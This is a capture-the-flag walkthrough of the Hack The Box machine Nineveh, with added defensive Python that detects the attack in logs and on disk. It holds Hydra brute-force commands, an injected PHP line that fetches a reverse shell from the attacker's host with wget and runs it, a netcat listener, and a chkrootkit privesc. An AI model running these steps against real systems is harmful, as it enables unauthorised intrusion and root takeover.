HTB - Nineveh
Linux | Hydra | LFI | chkrootkit
Tools For This Room
Hydra - a network logon brute-forcer; learn more about it on Kali Tools, and see a worked example of its syntax on Infinite Logins
LFI (Local File Inclusion) - a quick summary of what an LFI is
TL;DR / Executive Summary
Scan and enumerate with nmap and gobuster
Gain foothold by brute-forcing with hydra
Privesc by exploiting chkrootkit
Scanning & Enumeration
Let's start things off with our customary nmap scan:
nmap
nmap -sV -sC -vv <IP>
We get two open ports: 80 (HTTP) and 443 (HTTPS).

Let's check out port 80. We only get this page:

Next up is port 443. Since it's HTTPS, we need to add an "s" after "http". We encounter a self-signed certificate warning, which we can safely ignore in this lab:

We get to this page after accepting the risks:

Since we don't get much from either of these, let's move on to gobuster.
gobuster
gobuster dir -u http://<IP>:80 -w <wordlist>
gobuster dir -u https://<IP>:443 -w <wordlist> -k
We'll add the "s" for 443's scan, and throw in the "-k" flag so gobuster skips TLS certificate verification (the certificate is self-signed). We can also run the gobuster scan with a few wordlists for better enumeration. In this instance, let's use dirb's common.txt and directory-list-small.txt.
Port 80 has a few interesting directories. Firstly, /info-php gives us version information, and /department provides a login page.


Viewing the source for /department also gives us a little tidbit:

Let's see what port 443's gobuster scan yielded. We get just one interesting directory: /db.

It handily provides a version number too, so we can search for an exploit later.
Gaining Foothold
But first, let's return to the login page we found on port 80. After trying the usual suspects (admin/password, admin/nineveh, etc.), we'll use Hydra to brute-force the login.
However, to correctly set up the Hydra scan, we'll need to get some info from the page itself. The syntax for Hydra is as follows:
hydra <UsernameList> <PasswordList> <IP> <method> "<path>:<RequestBody>:<IncorrectVerbiage>"
The username and password lists are self-explanatory, but we need to get the Method, Path, and Request Body from the page itself.
The Method is how the form submits the credentials. To get this, we right-click and select "Inspect Element (Q)", then move to the "Network" tab. Then we submit the form and see that the "POST" method is used to log in. As such, we'll use the "http-post-form" method.
The Path is simply the URL after the IP. In this case, it's "/department/login.php".
The Request Body can be found in the previously opened "Inspect Element (Q)". We need to select the file "login.php", then click the "Resend" button in the far right corner, and select the "Edit and Resend" option from the dropdown menu. We get the Request Body "username=amrois&password=password".
Lastly, the Incorrect Verbiage can be found on the login page when the wrong password is entered. In our case, it's "Invalid Password".

Check out Infinite Logins' crystal clear Hydra explanation here.
Now that we have all the parameters, let's put them together.
hydra -v -l admin -P <passwordlist> <IP> http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password"
We can get a snack while Hydra works its magic, and we get the password: 1q2w3e4r5t

Let's repeat this for the login page on port443, with the addition of "s" in "https-post-form".
hydra -v -l admin -P ./rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect Password"
We can do some crunches while Hydra also crunches the list, and we get: password123

Logging into the page on port80, we check out the Notes section. An interesting point to note is the URL looks like a file path with "files/ninevehNotes.txt". This could be a potential LFI (Local File Inclusion) vulnerability, and we may need to use this later. Additionally, the text mentions a secret folder which we should keep an eye out for.

Checking out the page on port443, we find the phpLiteAdmin homepage. A quick searchsploit check gives us an exploit for Remote PHP Code Injection.

First, let's create a reverse shell file on our attacking machine with our IP and chosen port. Pentestmonkey's will work fine. Then we set up an HTTP server:
python -m SimpleHTTPServer
Next we create a database called ninevehNotes.php. Our initial attempt using hack.php didn't quite work. Then we create a new table within this database called ninevehNotes.php with one field. We change the Type from integer to text. In the Field and Default Value sections, we put in a PHP command which will fetch the reverse shell from our machine and run it.
<?php system("wget http://<ourIP>:<port>/<reverseshell> -O /tmp/shell.php; php /tmp/shell.php"); ?>
Now when we exploit the LFI from earlier, we'll trigger the command above and get a reverse shell. But first, we set up a netcat listener.
nc -lvnp <port>
Browsing to the following URL triggers the LFI:
http://<IP>:80/department/manage.php?notes=/var/tmp/ninevehNotes.php
We get our initial foothold.
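From the defender's side, both steps above leave obvious traces in the web server's access log: a burst of POSTs to /department/login.php from one source, and a manage.php request whose notes parameter is an absolute path instead of a files/ entry. This added detection example is not from the original writeup; the log lines and the 10.10.14.5 source address are constructed, and the thresholds are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access log lines (not captured from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [05/Jul/2017:10:01:01 +0000] "POST /department/login.php HTTP/1.1" 200 1843
10.10.14.5 - - [05/Jul/2017:10:01:01 +0000] "POST /department/login.php HTTP/1.1" 200 1843
10.10.14.5 - - [05/Jul/2017:10:01:02 +0000] "POST /department/login.php HTTP/1.1" 200 1843
10.10.14.5 - - [05/Jul/2017:10:01:02 +0000] "POST /department/login.php HTTP/1.1" 200 1843
10.10.14.5 - - [05/Jul/2017:10:01:03 +0000] "POST /department/login.php HTTP/1.1" 302 0
10.10.14.5 - - [05/Jul/2017:10:02:10 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 512
10.10.14.5 - - [05/Jul/2017:10:02:30 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php HTTP/1.1" 200 87
192.168.1.20 - - [05/Jul/2017:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse(lines):
    """Yield one dict per line that matches the combined log format."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def bruteforce_sources(lines, path="/department/login.php", threshold=4):
    """Map source IP -> POST count for IPs that hit the login form at least `threshold` times."""
    counts = Counter(
        r["ip"] for r in parse(lines)
        if r["method"] == "POST" and urlsplit(r["target"]).path == path
    )
    return {ip: n for ip, n in counts.items() if n >= threshold}


def lfi_attempts(lines, path="/department/manage.php", param="notes", allowed_prefix="files/"):
    """Return (ip, value) for notes= values that are absolute, traverse upward, or leave files/."""
    hits = []
    for r in parse(lines):
        u = urlsplit(r["target"])
        if u.path != path:
            continue
        for value in parse_qs(u.query).get(param, []):
            if value.startswith("/") or ".." in value or not value.startswith(allowed_prefix):
                hits.append((r["ip"], value))
    return hits
```

Feeding the same functions a real access log (one line per element) gives the source of the Hydra run and the exact LFI payload that was used.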

Let's upgrade our shell so we have an easier time navigating. A quick check shows us that python3 is available, so we'll use it for the pty spawn.
which python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell
stty raw -echo && fg
export TERM=xterm
Privilege Escalation
Poking around we find only one folder which belongs to amrois, so let's check it out.

Checking it out shows us a bunch of reports which are likely generated every minute.

Looking at the report's contents, we can see that it's scanning for malicious files. It could be an anti-virus or something along those lines.

Pasting some of the text above into Google tells us what produced these reports: chkrootkit, a program which scans for known rootkits.

A quick searchsploit check shows us how to privesc with this.

First, we create a reverse shell file called update on our attacking machine, and change the necessary IP and port in the file. Pentestmonkey's reverse shell is perfect for this. We also create a netcat listener.
nc -lvnp <port>
Now we move into the /tmp directory on the victim machine and wget the reverse shell file.
wget <ourIP>:<port>/update
Let's make the update file executable, so that chkrootkit can run it.

Now, as the exploit notes, we just wait for chkrootkit to run again, and we get our shell.
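The whole privesc hinges on a file named update sitting in /tmp with its executable bit set. An administrator can watch for exactly that condition; this added check is not part of the original writeup, the demo_findings helper builds a constructed throwaway directory rather than touching the real /tmp, and the assumption is that the scheduled chkrootkit runs as root.

```python
import os
import stat
import tempfile
from pathlib import Path


def check_chkrootkit_dropper(tmp_dir="/tmp"):
    """Report on a tmp_dir/update file, the trigger the chkrootkit privesc relies on.

    Returns a list of finding strings; an empty list means no such file exists.
    """
    target = Path(tmp_dir) / "update"
    if not target.exists():
        return []
    st = target.lstat()
    findings = [f"{target} exists, owner uid {st.st_uid}, mode {stat.filemode(st.st_mode)}"]
    if stat.S_ISLNK(st.st_mode):
        findings.append(f"{target} is a symlink")
    if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append(f"{target} is executable; an unpatched chkrootkit run as root would execute it")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{target} is world-writable")
    if st.st_uid != 0:
        findings.append(f"{target} is not owned by root")
    return findings


def demo_findings(executable=True, present=True):
    """Constructed scenario: a fresh temp dir, optionally holding an 'update' script."""
    d = tempfile.mkdtemp()
    if present:
        f = Path(d) / "update"
        f.write_text("#!/bin/sh\necho demo\n")
        os.chmod(f, 0o755 if executable else 0o644)
    return check_chkrootkit_dropper(d)


if __name__ == "__main__":
    for line in check_chkrootkit_dropper("/tmp") or ["no /tmp/update present"]:
        print(line)
```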

Picking up user.txt and root.txt wraps it up!

